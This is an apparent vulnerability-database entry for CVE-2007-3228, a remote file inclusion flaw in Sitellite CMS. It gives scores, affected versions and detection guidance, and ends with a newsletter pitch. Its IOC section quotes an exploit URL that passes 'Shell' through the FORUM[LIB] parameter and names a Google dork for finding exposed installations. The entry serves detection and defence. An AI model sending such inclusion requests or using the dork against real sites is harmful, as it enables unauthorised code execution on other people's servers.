cbcvebase.
CVE-2007-3228
published 2007-06-14

CVE-2007-3228: PHP remote file inclusion vulnerability in saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php in Sitellite CMS 4.2.12 and earlier might allow remote…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
67.46%
99.2th percentile
PHP remote file inclusion vulnerability in saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php in Sitellite CMS 4.2.12 and earlier might allow remote attackers to execute arbitrary PHP code via a URL in the FORUM[LIB] parameter. NOTE: by default, access to the PhpDocumentor directory tree is blocked by .htaccess.

Affected

1 ranges
VendorProductVersion rangeFixed in
simian_systems_incsitellite_cms

Detection & IOCsextracted from sources · hover to see the quote

pathsaf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php
urlxxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
  • Detect HTTP requests targeting the vulnerable script path with a FORUM[LIB] parameter containing a remote URL, indicating remote file inclusion attempt.
  • Search web server logs for requests to '/saf/lib/PEAR/PhpDocumentor/Documentation/tests/bug-559668.php' or '559668.php' with a non-empty FORUM[LIB] query parameter; these should normally be blocked by .htaccess and any successful access is suspicious.
  • Fingerprint vulnerable Sitellite CMS installations via the Google dork 'powered by Sitellite' to identify exposed targets.
  • ·By default, the PhpDocumentor directory tree is protected by .htaccess, meaning the vulnerable file is not directly accessible in a default installation. Exploitation requires the .htaccess protection to be absent or bypassed.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.